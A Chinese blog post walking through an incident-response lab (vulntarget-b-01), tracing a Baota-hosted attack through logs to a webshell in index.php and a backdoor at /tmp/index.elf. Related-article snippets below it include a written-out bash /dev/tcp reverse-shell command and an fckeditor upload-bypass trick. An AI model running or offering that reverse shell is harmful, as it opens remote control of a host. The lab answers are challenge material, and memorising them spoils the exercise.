玄机靶场——应急响应-vulntarget-b-01

最新推荐文章于 2025-04-23 20:51:03 发布
最新推荐文章于 2025-04-23 20:51:03 发布
阅读量1k 收藏 13
点赞数 24
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhouShaoy/article/details/145634119
版权

步骤

1、黑客是从哪个端口作为入口点的
2、黑客使用了什么工具探测了ssh服务
3、黑客使用了什么工具扫描了日录(格式fag{工具/版本号})
4、黑客成功登录后台的IP地址?
5、黑客上传的木马连接密钥是什么?
6、黑客留下的后门文件的路径为?

1、黑客是从哪个端口作为入口点的

可以使用ss -lnup进行查看被监听的端口

使用cat install.sh进行查看这个脚本,这里是使用宝塔作为控制面板的,在宝塔的脚本里面,可以看到宝塔打开的所以端口命令,与上图进行比较,可以发现81端口不是宝塔默认打开的端口,所以认为黑客是将81端口作为他的监控端口和入口点的

2、黑客使用了什么工具探测了ssh服务

使用cd /www/wwwlogs

cat access.log查看网页的日志文件,可以发现Nmap,所以黑客使用的是Namp作为探测工具

3、黑客使用了什么工具扫描了日录(格式fag{工具/版本号})

接着对同目录下的127.0.0.1.log文件进行查看,发现了gobuster/3.6,这是一款子域名挖掘工具

4、黑客成功登录后台的IP地址?

如上图,一般扫描工具的主机一般是登录的IP地址,所以登录后台的ip地址为192.168.83.1

5、黑客上传的木马连接密钥是什么?

使用命令将含有gobu的日志全部过滤掉,然后再进行查看,发现有GET传参和POST传参

发现有GET传参和POST传参,先对POST传参进行查看

这里有可疑信息

这里分析一下,黑客使用账号和密码登录进去之后,黑客进行修改了index.php文件

使用命令cd /www/wwwroot/jizhi

cat index.php进行查看index.php,发现了有一个一句话木马存在

所以密钥为Admin@@

6、黑客留下的后门文件的路径为?

切换到/tmp公共目录下

发现有一个index.elf文件

将这个文件放到云沙盒进行查看

可以知道它是一个后门文件

黑客留下的后门文件的路径为/tmp/index.elf

Zs_OY
关注
Vulntarget-b靶场渗透WP
Fear1e4的博客
06-13 579
nmap端口探测网页访问端口目录扫描网页直接登陆报错404。访问admin.php,有后台管理系统登陆页。bp弱口令爆破admin123,版本1.8.1,查漏洞。
玄机靶场 第一章 应急响应- Linux入侵排查
qq_46343633的博客
06-04 1581
1.web目录存在木马,请找到木马的密码提交2.服务器疑似存在不死马,请找到不死马的密码提交3.不死马是通过哪个文件生成的,请提交文件名4.黑客留下了木马文件,请找出黑客的服务器ip提交5.黑客留下了木马文件,请找出黑客服务器开启的监端口提交。
vulntarget-b
m0_46105229的博客
04-25 3603
文章目录前言一、centerOS71.扫描IP2.扫描服务3.漏洞利用二、win10域环境1.扫描IP2.漏洞利用三、域控Windows server2016总结 前言 靶场是vulntarget-b,环境可以自己百度下载 拓扑图: 一、centerOS7 1.扫描IP nmap -F 192.168.252.3-254 2.扫描服务 sudo nmap -sV -p 21-10000 192.168.252.151 浏览器访问http://192.168.252.151:81/,发现是一个极
玄机-应急响应-vulntarget-k-01
m0_63468055的博客
07-12 2175
玄机-应急响应-vulntarget-k-01
玄机靶场——应急响应-vulntarget-j-01
ZhouShaoy的博客
02-24 411
3.黑客添加的木马文件名称和密码分别是什么,将黑客添加 的木马名称和密码作为flag提交{fag(名称:密码)1.主站进入后台的文件名称(格式flag{xxxxxxxxxx.php})4.黑客攻击机IP地址是多少(因模拟环境故为内网地址)打开小皮查看网页端口,7001打不开,所以为80。木马上传的ip是192.168.112.123。在POST传参找到这个api3.php。2.黑客是从哪个端口上传木马文件的?最后打开发现连接密码为Admin。查看apache日志,找到。
【靶场实战】vulntarget-b漏洞靶场实战
TT小子的博客
06-20 1913
vulntarget-b漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
vulntarget】系列:vulntarget-b 练习WP
一只爱吃橙子的羊
07-12 1162
vulntarget】靶场系列,vulntarget-b 练习WP,会持续更新……
勒索病毒——vulntarget应急响应靶场
m0_57594430的博客
11-16 1851
勒索靶场学习!
vulntarget-b靶场详细通关记录
tpaer的博客
11-23 4234
vulntarget-b靶场最详细通关记录。
玄机靶场——应急响应-vulntarget-j-02
ZhouShaoy的博客
02-23 2349
或者,可能修改了环境变量中的路径,将常见的程序如notepad.exe指向恶意文件。fckeditor <= 2.6.8 for asp 运用%00截断,首先上传文件名为shell.asp%00txt,结果为shell.asp_txt,再次上传同名文件,结果为shell(1).asp,成功绕过。正常的cmd.exe文件应该是C:\Windows\System32\cmd.exe,所以判断恶意程序的名称为cmd.exe。进行对网址目录下的文件机进行扫描,发现一个5(1).asp的木马,不是我传的。
75 应急响应-数据库&漏洞口令检索&应急取证箱
山兔的博客
10-25 258
经常保证工具的使用,保证最新最全的相关工具的使用,这样子可以保证分析的时候更加快捷,所以工具和脚本,他的分类比较复杂,有的是做数据库日志的,有的是系统日志的,有的是中间件日志分析,各种各样的工具脚本,来分析这些特定的东西,不可能说有一个工具能够全部分析到,那只是说综合性工具比较少,都是一些搜索类的检索工具,像elk,spualk这种平台,对各种日志分析到,但是他不提供自动化的分析功能,他只能够帮你快捷的对各种日志进行清晰的探针。对数据库日志进行分析,可以发现攻击行为,进一步还原攻击场景及追溯攻击源。
玄机-Wordpress-应急响应-WP
weixin_42467891的博客
02-23 1877
前言,日志分析题目我们要先查看攻击者特征和 ip 等,靶场环境是 nginx 的,我们去找 nginx的日志。通过分析可以得出以下日志可均为攻击日志的特征,该日志使用 webshell 执行了系统命令,以该日志为基准完成改题目。
玄机靶第一章 应急响应-Linux日志分析
qq_46343633的博客
06-04 1850
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用",“分割2.ssh爆破成功登陆的IP是多少,如果有多个使用”,“分割3.爆破用户名字典是什么?如果有多个使用”,"分割4.登陆成功的IP共爆破了多少次5.黑客登陆主机后新建了一个后门用户,用户名是多少这次靶场是用来确定攻击者的相关信息,以便于后期的溯源和编写应急响应报告。
【玄机】应急响应-Linux日志分析
qq_40923603的博客
02-23 4924
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割。2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割。3.爆破用户名字典是什么?如果有多个使用","分割。5.黑客登陆主机后新建了一个后门用户,用户名是多少。4.登陆成功的IP共爆破了多少次。
玄机-第一章 应急响应-webshell查杀
lin__ying的博客
07-27 677
session_start():用于创建或重启一个会话,这是 PHP 木马中常见的功能,用于存储攻击载荷或状态信息。eval()、assert():这些函数用于执行字符串作为 PHP 代码,是 PHP 木马中常见的执行恶意代码的方式。黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx。黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}cat gz.php #查看gz.php文件。
vulntarget-b 免杀火绒,多层域控内网靶场
weixin_68408599的博客
12-31 1485
靶场环境:项目地址:涉及知识点:极致cms相关漏洞、禅道cms相关漏洞、隧道代理、免杀、CVE-2021-1732 、CVE-2021-42287/CVE-2021-42278kali攻击机 ip:192.168.127.129。
OSPF综合实验
weixin_74344274的博客
04-19 969
172.16.131.0/24 ---R10环回。172.16.34.0/24 ---R1环回。172.16.35.0/24 ---R2环回。172.16.66.0/24 ---R11环回。172.16.130.0/24 ---R9环回。172.16.36.0/24 ---R3环回。172.16.98.0/24 ---R8环回。172.16.2.0/24 ---R4环回。172.16.3.0/24 ---R5环回。172.16.5.0/24 ---R7环回。
第六章 QT基础:4、QT的TCP网络编程
最新发布
qq_62848032的博客
04-23 647
TCP(Transmission Control Protocol)是一种面向连接的可靠通信协议,主要特性如下:NOTE]三次握手建立连接可靠传输:顺序、无丢包面向流:数据无结构边界适用场景:聊天、网页、文件传输Qt 中的 TCP 通信机制与基本原理QTcpServer 如何监听 + 接收连接 + 获取 QTcpSocketQTcpSocket 如何连接服务器 + 发送接收数据C++ 构造函数、QObject 父子机制、信号槽绑定细节。
应急响应-vulntarget-j-01
03-16
### 应急响应中的漏洞目标与配置信息 在应急响应过程中,针对 `vulntarget j 01` 的配置和漏洞目标分析可以分为以下几个方面: #### 1. 环境概述 此题目所描述的是一个中型环境下的应急响应场景[^1]。其核心目的是通过重现攻击路径来帮助应急人员快速定位并确认受害主机中存在的安全漏洞。 #### 2. 攻击路径还原 为了有效还原攻击路径,通常需要关注以下几点: - **日志文件审查**:检查系统日志(如 `/var/log/auth.log`, `/var/log/syslog`),寻找异常登录记录或其他可疑活动。 - **网络连接状态**:利用命令如 `netstat -anp | grep ESTABLISHED` 或者更高级工具(如 Wireshark)捕获实时流量数据。 - **恶意脚本检测**:例如给定的 Bash 脚本可能被用于建立反向 Shell 连接[^3]: ```bash bash -c 'exec bash -i &>/dev/tcp/192.168.138.133/8888 <&1' ``` #### 3. CMS 实战案例解析 根据提供的 Linux 实战题解,在第五章节提到的具体 Flag 值表明该任务涉及到了某种 Web CMS 漏洞利用过程[^2]。此类问题往往源于未及时更新软件版本或者错误的安全配置。 #### 4. 安全加固建议 基于上述发现,可采取如下措施加强防护能力: - 更新所有已知存在风险的应用程序至最新稳定版; - 关闭不必要的服务端口减少暴露面; - 设置强密码策略并启用双因素认证机制; - 对敏感操作实施访问控制列表(ACL),仅允许授权IP地址范围内的请求进入内部网络区域; #### 结论 综上所述,“vulntarget j 01”的主要工作围绕着识别潜在威胁源以及修复相应的弱点展开。这不仅考验技术实力同时也锻炼逻辑思维能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值